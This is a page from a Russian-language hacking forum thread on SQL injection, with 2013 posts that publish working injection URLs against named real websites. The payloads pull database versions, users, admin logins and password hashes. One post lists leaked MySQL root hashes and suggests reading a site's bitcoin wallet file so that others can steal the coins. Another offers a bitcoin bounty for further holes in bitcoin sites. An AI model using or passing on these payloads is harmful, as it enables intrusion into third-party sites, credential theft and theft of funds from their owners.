HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1572 из 1604 « Первая < 5721072147215221562 1568 1569 1570 1571 1572 1573 1574 1575 1576 1582 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15711  
Старый 29.10.2013, 08:32
Sum.cogitans
Guest
Сообщений: n/a
Провел на форуме:
62329

Репутация: 19
По умолчанию
Вот знаете, утро как-то сразу задалось настроение прям радостное сразу.

Официальный сайт Анфисы Чеховой:

Код:
Code:
www.achekhova.ru/img.php?id=-99+UNION+SELECT+1,2,3,group_concat(user(),0x3a,version(),0x3a,database())+--+&rub=press
P.s. Результат в сорсе смотрите, или в URL изображения.

P.p.s. Ну ловко ребята вывод ошибки скрыть попытались. Юзаем cmd+a\ctrl+a.

UPD Нарыл схему DB crawlp - URL, дальше сами, а мне работать пора .)

На закуску:

Код:
Code:
http://www.osnova-pc.ru/prosmotr_posta.php?id=-85'+UNION+SELECT+1,2,group_concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11+--+
joomla

ТИЦ\PR шлак

Траф 2.5 в неделю

Позиции в яндексе интересные: http://pr-cy.ru/a/www.osnova-pc.ru
 
Ответить с цитированием

  #15712  
Старый 30.10.2013, 14:22
\/IRUS
Guest
Сообщений: n/a
Провел на форуме:
118953

Репутация: 37
По умолчанию


http://bitvisitor.com/ - заработай биткоины за просмотр сайтов

на главной в заголовке Referer

MySQL AND/OR time-based blind

Цитата:
Сообщение от None  
GET / HTTP/1.1
User-agent: Vasya with IE
Host: bitvisitor.com
Referer: '||(SELECT 'TXIo' FROM DUAL WHERE 3847=3847 AND 4515=IF((QUARTER(NULL) IS NULL),SLEEP(1),4515) )||'
Connection: close
web server operating system: Linux Debian 6.0 (squeeze)

web application technology: PHP 5.3.3, Apache 2.2.16

banner: '5.1.66-0+squeeze1-log'

current user: root

database management system users password hashes:
[*] root [2]:

password hash: *AC3AC8E16952F531C8E9FE03ECD18DA0E0E771C7

password hash: *ED5785C53CE4F9F7A220427C0F14905F92E6695B

File_Priv=Y

можно LOAD_FILE('**********/.bitcoin/wallet.dat')

на кошеле половинка биткоина (~100$)

я не трогал, кто хочет заработать вперед
 
Ответить с цитированием

  #15713  
Старый 30.10.2013, 21:35
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию
ТЕХНО-М

Код:
Code:
http://www.techno-m.ru/index.php?prod=93+order+by+8+--+
Hi-tec.com.ua

Код:
Code:
http://hi-tec.com.ua/index.php?idmainproduct=-91+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28hiteccomua_kbt.kbt_user%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,uname,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
 
Ответить с цитированием

  #15714  
Старый 31.10.2013, 23:51
\/IRUS
Guest
Сообщений: n/a
Провел на форуме:
118953

Репутация: 37
По умолчанию


time-based blind

http://www.bitcoinlivebets.com/index.php?action=livewetten&qf=%22%2b(select(0)fro m(select(sleep(6)))v)%2b%22&u=livebereich

биткоэны Отаке!

КОНКУРС: кто постит следующую уязвимость на Биткоен сайте получает от меня 1 BTC ~ 197$ (начало 31.10.13, конец 02.11.13)

P.S. ОБЯЗАТЕЛЬНО!!! присутствие слова bitcoin в названии сайта.
 
Ответить с цитированием

  #15715  
Старый 01.11.2013, 00:41
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию
www.igornikolaev.ru

Офф сайт Игоря Николаева

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.igornikolaev.ru/music/textout.php?id=94+or+1+group+by+concat((),0x00,floor(rand(0)*2))having+min(0)+or+1--+

[/COLOR][/COLOR
db 5 version

CY:130||PR:

==================================================

www.inconnect-group.ru

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.inconnect-group.ru/pressrelease/?id=96+limit+0,0+union+select+1,2,3,4,,6,7,8,9--+[/COLOR][/COLOR] 
db 5 version

CY:700||PR:5

==================================================

www.agidis.ru

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.agidis.ru/?id=98+or+1+group+by+concat((),0x00,floor(rand(0)*2))having+min(0)+or+1--+

[/COLOR][/COLOR
db 5 version

CY:30||PR:2

==================================================

www.landscrona.ru

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.landscrona.ru/tales/index.php?id=115+limit+0,0+union+select+1,2,,4,5,6,7,8,9,10,11,12,13,14,15,16--+

[/COLOR][/COLOR
db 5 version

CY:450||PR:4

==================================================
 
Ответить с цитированием

  #15716  
Старый 02.11.2013, 19:49
compod
Guest
Сообщений: n/a
Провел на форуме:
9089

Репутация: 1
По умолчанию
CY - 120

PR - 5

Вывод в исходники, ищите по разделителю ~|~

Цитата:
Сообщение от None  
tarasovka.ukrmisto.net/company.php?id=999999.9'+union+select+(select+conc at(concat_ws(0x7e7c7e,users.id,users.login,users.p assword))+from+`ukrmisto_misto`.users+where+users. id=1),0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c ,0x7c,0x7c,0x7c +--+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Ответить с цитированием

  #15717  
Старый 02.11.2013, 21:00
Amoura
Участник форума
Регистрация: 23.01.2008
Сообщений: 182
Провел на форуме:
2268999

Репутация: 410
Отправить сообщение для Amoura с помощью ICQ
По умолчанию
Код:
Code:
http://www.northernoutpost.com/news.php?id=13+AND+1=2+UNION+SELECT+1,2,3,version%28%29,5,6,7,8+--+
Код:
Code:
http://www.almarecords.com/news.php?id=39+AND+1=2+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11+--+
 
Ответить с цитированием

  #15718  
Старый 03.11.2013, 09:09
compod
Guest
Сообщений: n/a
Провел на форуме:
9089

Репутация: 1
По умолчанию
Букинг отелей:

Цитата:
Сообщение от None  
http://glenavonhotel.co.uk/offer_one.php?id=999999.9'+union+select+0x7c,0x7c, 0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,(sele ct+concat(group_concat(table_name))+from+informati on_schema.tables+where+table_schema='andycameron') ,0x7c,0x7c,0x7c,0x7c,0x7c --+
 
Ответить с цитированием

  #15719  
Старый 03.11.2013, 20:58
palec2006
Guest
Сообщений: n/a
Провел на форуме:
9263

Репутация: 8
По умолчанию
Системы безопасности))

Цитата:
Сообщение от None  
http://www.aktivsb.ru/price_new.php?catid=-1+union+all+select+1,2,(select+group_concat(concat (unhex(Hex(cast(managers.login+as+char))),0x3A),un hex(Hex(cast(managers.passwd+as+char)))+SEPARATOR+ 0x3C6272202F3E)+from+`aktivsb`.managers),4,5,6--
db:5.5.31

CY:1000

PR:4

Траф:10к

мыльник достоин внимания.
 
Ответить с цитированием

  #15720  
Старый 05.11.2013, 23:08
Unknown
Guest
Сообщений: n/a
Провел на форуме:
77731

Репутация: 33
По умолчанию
Код:
Code:
http://www.pangeaday.org/filmDetail.php?id=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
 
Ответить с цитированием
Ответ
Страница 1572 из 1604 « Первая < 5721072147215221562 1568 1569 1570 1571 1572 1573 1574 1575 1576 1582 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ